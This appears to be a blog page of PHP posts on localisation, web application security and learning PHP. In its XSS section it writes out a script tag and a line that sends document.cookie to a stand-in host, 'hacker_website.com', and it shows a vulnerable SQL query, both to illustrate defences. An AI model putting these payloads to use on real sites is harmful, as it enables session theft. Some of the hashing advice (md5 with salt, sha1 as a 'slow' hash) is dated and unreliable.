[UTF-32BE] => UTF-32BE
[UTF-32LE] => UTF-32LE
[UTF-16] => UTF-16
[UTF-16BE] => UTF-16BE
[UTF-16LE] => UTF-16LE
[UTF-8] => UTF-8
[UTF-7] => UTF-7
[UTF7-IMAP] => UTF7-IMAP
[ASCII] => ASCII
[EUC-JP] => EUC-JP
[SJIS] => SJIS

Select one and save in the database.

6. Set encoding for non html content by sending the correct headers

When echoing content like css , javascript , xml etc. set the correct encoding via the header function like this :

XML

header(‘Content-Type: text/xml; charset=utf-8’);
//Echo rest of the xml content

Javascript

header(‘Content-Type: text/javascript; charset=utf-8’);
//Echo rest of the javascript content

7. Set correct character set for html and xml output

HTML : This goes in the head tag of an html document

1
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

html5 supports :

1
<meta charset="utf-8">

XML : The first line of an xml document has the encoding specified

1
<?xml version="1.0" encoding="utf-8"?>

8. Set correct locale

Locale settings provide useful locale related settings like how to format numbers , currency symbol etc. The correct locale for the application should be setup as early as possible in the script.

1
setlocale(LC_ALL, 'en_US.UTF-8');

Provide the user with a list of locales to select from. Check here to learn how to do that.

9. Format numbers according to locale

When displaying numbers like plain number or currency numbers , format them with comma , decimal etc properly using function money_format. Here is a quick example :

1
2
3
4
5
6
7
8
9
10
11
12
$amount = '100000';
//Format numbers in Indian format - Lakh , Crore
setlocale(LC_MONETARY, 'en_IN');
$am = money_format('%!i', $amount);
echo $am;    //1,00,000.00
//Format in million , billion
echo "<br />";
setlocale(LC_MONETARY, 'en_US.utf8');
$am = money_format('%!i', $amount);
echo $am;    //100,000.00

10. Format display of dates

Format date display according to user format. Some different kind of date formats used are

ISO Format : 2012-04-13 (YYYY-MM-DD) Asian countries : 13-04-2012 (DD-MM-YYYY) USA : 04-13-2012 (MM-DD-YYYY)

Dates have to be formatted both when displaying and when being entered in a form.

Form entry : 13/04/2012 or 04/13/2012 Display : 13 Apr 2012 or Apr 13, 2012

Formatting date with strftime :

1
2
3
4
5
$format = '%d-%b-%Y';
$stamp = time();
$display_format = strftime( $format , $stamp);
echo $display_format;   //Output 14-04-2012

Formatting with DateTime object :

1
2
3
4
$t = date('Y-m-d h:i:s');
$d = new DateTime($t , new DateTimeZone(date_default_timezone_get()) );
$display_format = $d->format("d-m-Y");
echo $display_format;    //15-04-2012

User should be have the option to select formats for displaying date and entering dates in forms. The user selected format , for example d-m-Y can be saved in database and reloaded next time.

11. Make the application multilingual

Finally change the language of the application to what the user wants. There are many ways to make your application multilingual. One way is to collect all label text in your application and fetch the translations from google translate service. Find out more on google.

Conclusion

Applications should be localised properly for better user experience. Applications should allow the user to select the localisation settings like timezone , locale , language , date display format etc.


15+ tips to secure your php application


Php is used to write web applications which are online and publicly accessible. Therefore security is a fundamental necessity of these applications to keep the data safe and free from unauthorized access.

Below are a bunch of simple tips/hacks/ideas to design your php applications to have better security.

The Code

1. Avoid short tags

If they are disabled on some server , then all of a sudden the whole php code will be displayed even before you are informed about it.

1
2
3
<?
$a = 5;
?>

This will run fine when short codes are enabled, but when not, the whole code will be dumped to the browser.
As of php 5.4 the short echo tags (

Also enable short tags on your server.

2. Validate all user input

All input coming from the user , in the form of POST and GET must be validated to be acceptable by the application logic.

  • Check the ‘type’ of the data
  • Check range of numbers
  • Check length of strings
  • Check emails , urls , dates to be valid
  • Ensure that data does not contain unallowed characters.

Few functions to filter/validate data :

htmlentities()
strip_tags ()
utf8_decode ()
htmlspecialchars()
ctype_digit()
ctype_alnum()
stripslashes()
str_replace()

3. Escape query data

Escape all data that goes inside a query and for the better avoid direct sql queries in your application.
Use somekind of abstraction like activerecord etc.

One small sql injection vulnerability is enough to allow a hacker to completely take over the system. Tools like sqlmap take only a few minutes to this. So if there is even a single page with a sql injection vulnerability in the whole site for example

http://www.site.com/path/page.php?id=5

where the id is being used in an sql query and is not escaped, this is a door big enough to allow a hacker to do anything on your system. So be very aware of sql queries and ensure everything is secure.

This is how a vulnerable sql query looks like

1
2
$id = $_GET['id'];
$this->db->query("SELECT * FROM pages WHERE id = '$id'");

The id parameter should be escaped by using appropriate functions like mysqli_real_escape_string() before putting them in the query.

4. Cross site scripting

Cross site scripting allows a hacker to inject client-side code in a webpage. For example take the url

search.php?term=ipad

And that the php code for the script is

1
2
3
4
5
6
7
8
<?php
$term = $_GET['term'];
?>
...
Search results for : <?php echo $term; ?>
...

The above piece of code looks quite OK except that the user input in $term is being echoed directly back.
Consider the url

search.php?term=<script>alert('hi');</script>

The script tag will be echoed in the body and the code in it would be executed. Ofcourse its a clientside problem and the code is executed in the user’s browser, but still this kind of vulnerability has all the potential a hacker would look for.

Recent versions of Google Chrome would block it saying “Refused to execute a JavaScript script. Source code of script found within request.” Firefox still executes it.

XSS is mostly used to inject javascript code to steal cookies of legitimate users who are logged in. The hacker can first inject a complete script like this

<script type=text/javascript src="http://www.hacker_website.com/xss.js"></script>

Now the xss.js can have the following piece of code to take away value of the document.cookie variable and send it to hacker_website.com

document.location = 'http://www.hacker_website.com/steal.php?cookies=' + encodeURI(document.cookie);

This is just a basic idea of how it works. Check the xss cheatsheet for a list of different techniques that can be used.

Fix XSS

Whenever echoing user input of any kind, use htmlentities to convert all html characters to corresponding html entities.

1
2
3
4
5
6
<?php
$term = $_GET['term'];
?>
...
Search results for : <?php echo htmlentities($term); ?>
...

Now whatever will be echoed from $term would not have any html code.
Other functions like strip_tags and htmlspecialchars can also be used to clean the input data.

session.cookie_httponly

This php.ini setting specifies the ‘HttpOnly’ flag in the Set-Cookie field of the http headears. By specifying the HttpOnly flag, we instruct the browser to not expose the cookie to client side scripting language like javascript and use it only for the http communication.

session.cookie_httponly = 1

As of now, all modern browsers support this option and hence it is a quick way to protect the cookies. It would make harder for an attacker to steal the cookie and hijack the session.

5. Always name your file as only .php

Although this is a not very significant to mention point, but still there have been instances of this particular security flaw.

Ensure that all php code files have the extension “.php”
Lets say the database credentials are stored in a separate configuration file and that the file has been named as ‘config.inc’.

1
2
3
4
5
6
7
8
9
10
<?php
/*
Database connection details
*/
$db_host = 'localhost';
$db_user = 'project';
$db_pass = 'secret';
$db_name = 'project_ecommerce';

Now if this file is opened in the browser, the contents will be displayed right away.
Hence never name your files to anything else except .php

6. Salt the passwords and use stronger encryption like bcrypt

Md5 is a very popular encryption algorithm/function being used by php developers. The md5 function gives the hash rightaway.

$hash = md5($password);

However md5 is not a fully secure way to store passwords. Most users tend to keep a 5-8 character password, and whatever be the complexity of such a password, it can be easily cracked by just bruteforcing on a normal computer/pc.

Moreover even bruteforcing might not be necessary, just typing the hash on google.com would reveal the password on some password cracking/rainbow table website. Although users are repeatedly told to keep a strong password its not enough.

To overcome this problem developers often use “salt”. The add some more text to the password before hashing it and then do the same when comparing user provided password.

1
2
$salt = 'SUPER_SALTY';
$hash = md5($password . $salt);

Adding a salt increases the length of the password, and hence its complexity. So the time required for a brute force program to crack it increase by a huge span.

Along with salt, its a good practice to use a longer(slower) hash algorithm like sha1, sha2 etc. The slower the hashing algorithm, more the time required by a brute force program and hence better the strength.

Bcrypt encryption is even more complex than the sha algorithm and considered more secure. Check the php crypt function.

7. Protect against CSRF

CSRF stands for Cross Site Request Forgery. In this attack a hacker makes a legitimate user do an action on the target web application, without the user being aware at all that he is doing something on the target website.

Lets say a certain url in the application performs some database changes

update_info.php?id=123
delete_record.php?id=123

The problem with the above url is that, what if a hacker makes a legitimate user call such a url without the user actually noticing it.

A hacker can setup a webpage with the following piece of code

And now ask the user to open this webpage. Now since the user is logged into the application the url will be triggered and whatever action necessary would be taken by the script.

So basically a hacker has made the request through the user. This is “request forgery”.

So technically speaking the problem here is that the server is not able to identify if the user willingly called the url or not. Hence there needs to be a mechanism for this.

A simple way to verify this is by asking the user for double confirmation when doing important tasks.

A more robust and generic solution is to enable the server to identify each request with a key/random value. Forms can contain a hidden input field with a random value that was generated and saved in the session to identify this form submission.

Now if a hacker tries to forge a request he would run out of the csrf key/token and his attempt to perform the request on behalf of the actual user would fail. Only if the user actually loads a url/page with his own wish, would it contain the csrf protection key and then if the user makes the request, would the task be really executed.

Securing the Session

8. Regenerate Session ID

It is a good idea to regenerate the session id at specific events or intervals. It might help if the earlier session id was hacked.

To regenerate the session id use the following function

1
2
3
session_regenerate_id(); //changes only session id
//or
session_regenerate_id(true);

The session id should be regenerated atleast when authentication levels change, for example when

  • a user logs in
  • a user logs out
  • a user gets administrative access or change of privilege happens.
1
2
3
4
5
if(valid_username() and valid_password())
{
    $_SESSION['logged'] = true;
    $_SESSION['username'] = $username;
}

You may even want to regenerate session id every 15 minutes or every 100 requests ?

1
2
3
4
5
6
7
8
9
session_start();
//increment and check
if ( ++$_SESSION['regenerated_count'] > 100 )
{
    //reset and regenerate
    $_SESSION['regenerated_count'] = 0;
    session_regenerate_id(true);
}

9. Lock the user agent during a session

This can help prevent session hijacking. It is simply about checking if the user agent of a user changed or not. If it did , then logout the user and ask to login again. First save the user agent signature when the user logs in. Then on every request compare the current user agent with the old user agent.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
//Function to check if user is logged in or not
function check_login_status()
{
    if($_SESSION['logged'] == true and $_SESSION['old_user_agent'] == $_SERVER['HTTP_USER_AGENT'])
    {
        return true;
    }
    
    return false;
}
if(!check_login_status())
{
    logout();
}
//Rest of the login protected page

A better comparison string would be a hash of various user agent details.

1
$user_agent = md5( $_SERVER['HTTP_ACCEPT_CHARSET'] . $_SERVER['HTTP_ACCEPT_ENCODING'] . $_SERVER['HTTP_ACCEPT_LANGUAGE'] . $_SERVER['HTTP_USER_AGENT']);

If the value of this hash ever changes, logout the user and make him login again. This is a practical approach and should be implemented as a standard practise in any web application.

Lock the IP of a session

If even stronger security is required, then the user’s ip address can be locked as well during a session. Just add it to the user_agent hash so that it gets used in the comparison.

1
$user_agent = @md5( $_SERVER['HTTP_ACCEPT_CHARSET'] . $_SERVER['HTTP_ACCEPT_ENCODING'] . $_SERVER['HTTP_ACCEPT_LANGUAGE'] . $_SERVER['HTTP_USER_AGENT'] . $_SERVER['REMOTE_ADDR']); 

10. Store sessions in database

By default sessions are stored in files. Many applications are hosted on shared hosting environments where the session files are saved to /tmp directory. Now this directory may be readable to other users. If unencrypted the session information will be plain text in the file :

userName|s:5:”ngood”;accountNumber|s:9:”123456789″;

There are many workarounds for this. Encrypt the session information with suhosin. Check out theFeatures.

Store sessions in database. Sessions stored inside database are not visible like files. They are only available to the application using it.

11. Force single session

If needed , make sure that a user is not logged in from 2 locations at a time. If another login takes place , then logout the previous login. This is useful on websites that exchange confidential data , for example an online shopping website.

This is easy to implemented when sessions are saved in database. Simply delete any previous login record of a username on every login.

The Setup

12. Configure the database user with care

Make sure the database user does not have privileges to execute command or write to local filesystem. If there is an sql injection vulnerability somewhere in the website and the database user has write privileges, then this is sufficient for a hacker to take over the server completely just by using simple tool like sqlmap.

So the permissions of the database user should be set according to needs. It is a good idea to have a separate user for use by the web application that has only the minimal required privileges on the database system. Or have separate database users for viewing and modifying the database.

13. Disable directory content listing

Using htaccess

Putting the following the .htaccess file shall disable directory listing.

Options -Indexes

Using index.html

If the server does not allow this, then the easiest way is to put a dummy index.html file in all directories.
So that when directory path is accessed, the index.html will open up.

14. Keep resources outside WEB_ROOT

When hosting applications on a server , the path is generally like this :

/var/www/
OR
/home/username/www/

All web content is kept inside www , then only it is accessible on a website. But those contents which are not meant to be directly accessible from a url , can be kept outside the /www.

For example uploaded images , or resource files , or files containing database connection parameters or anything.

php files to be called by browser in
/var/www/Other resource files in
/var/outside/

By doing this the files automatically become invisible to outside world even if directory listing is enabled.

Upload files to a location outside webroot

Applications that allow users to upload files can put the uploaded files in a location that is outside the web root. This can help in a situation of arbitrary file upload. If a hacker were to find such a vulnerability he would try to upload a shell script and execute it by triggering from the browser. Now if the file is outside the web root, then even if the hacker would know the path to the file, it would be harder for him to execute the shell.

15. Disable display_errors in your php.ini file

Do not wait to turn off display_errors in your php script using ini_set or htaccess or anything similar.
Compilation errors that occur before execution of the script starts will not obey any script rules and would be displayed right away. Hence display of errors should be disabled right in the php.ini file in production environment.

16. Setup correct directory permissions in the production environment

Directories should have proper permissions with regard to the need of being writable or not. Keep a separate directory for temp files, cache files and other resource files and mark them writable as needed. Everything else like the directory containing core application code, library files etc should be unwritable.

Also directories (like temp) which can contain resource files, or files with other information should be guarded well and be totally inaccessible to the outside web. Use htaccess to block all access to such directories

deny from all

Resources

1. http://phpsec.org/projects/guide/
2. http://en.wikipedia.org/wiki/Session_fixation
3. http://www.slideshare.net/jikbal/web-application-security-with-php
4. http://www.sk89q.com/2010/04/printable-php-security-checklist/

Detailed tutorial on HttpOnly at Owasp
https://www.owasp.org/index.php/HttpOnly

Check out the following blog post for more tips on improving security of php and apache
http://simonholywell.com/post/2013/04/three-things-i-set-on-new-servers.html


6 tips to learn PHP fast and effectively


Php is today the most widely used language/platform for development of web based applications and websites. At the same time it is the easiest to learn and use. There are lots of free tutorial websites out there that can be followed to learn php without much effort. Along with these tools having the right approach can speed up the learning curve.

So here are few ideas that I found to be very helpful in my learning days.

1. Build an application

After learning the basic language constructs start making something on your own. Projects are the real environment to learn all aspects of the language from all angles. Topics like database connection, form handling, sessions, security would all come in themselves and the learning process would be more practical than just reading books chapter by chapter and forgetting again.

For example you could start building a basic cms, that allows to create pages on a website. This would require form handling, database storage, and sessions. Then slowly introduce new things like file upload, media management etc. By the time you are finished writing a complete application you would be knowing much more than what you would have learned by just reading a book.

2. Start using an mvc framework

Once you are able to make a workable application by bunching together scripts, mvc frameworks are the next important thing to learn. Stands for model view controller, and it is a “style” of coding that is now default-ly used in web applications. I would suggest starting with codeigniter as it is the simplest and quickest to learn and adapt to. Almost any kind of php script can be put inside it with little effort.

MVC frameworks primarily enable 2 things, namely :

1. Separate dynamic(php) code from static(html, css, js) code – This is a necessity as well as a good approach to write and maintain code.

2. Enforce object oriented coding – mvc brings OOP to web scripting along with all its benefits.

If you have written a basic application in step 1 then the next thing you can do is to put it inside an mvc framework and make it more organised.

3. Read the documentation

Php.net is the php documentation website and contains a lot of literature to read at free time. The comments specially contain useful advice and code snippets. If you visit the site for a particular function, then you can read a few more just for information and so on.

4. Start freelancing

If you are learning php then chances are that you are seeking a career in web development either as a freelancer, job or something similar. If your schedule is not already very tight and you do have a lot of spare time then freelancing is something to give a try.

Lots of freelancing marketplace websites are there like freelancer.com, odesk.com, elance.com where buyers come looking for freelancers to get work done at cheap and affordable prices. Try working on few projects on those websites and you would surely get to learn a lot lot more.

5. Watch other applications and learn

Php is used to code almost any kind of web application like blog, ecommerce platform, cms, forum, image gallery etc. Take your time to study other popular applications and see what they do an how. This gives you a better feel of how applications look and what features they have.

For example wordpress, the most popular blogging platform is a simple php application. It allows for creating posts, pages, uploading images etc. It also has support for plugins. These are the features you can look forward to, if you are trying to build a blog. Similarly oscommerce is a php based ecommerce application.

6. Go to irc

Whether it be about programming or fixing my computer hardware, irc is the first place I throw a question at. IRC is the place where experts can be found on any topic. The room for php is #php. If you are stuck somewhere and google does not seem to be doing enough, then get right into the room of the wizards and ask. Irc is not only the best place to get solution on a problem, but also to get feedback and advice free of cost.

One response to “Many useful and handy Php tips for beginners

  1. Micro 29 March 2015 at 06:46

    Great post. I was checking continuously this blog and I am impressed!
    Extremely useful info specially the remaining phase :) I handle such info
    a lot. I used to be seeking this certain info for a long time.
    Thanks and good luck.

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s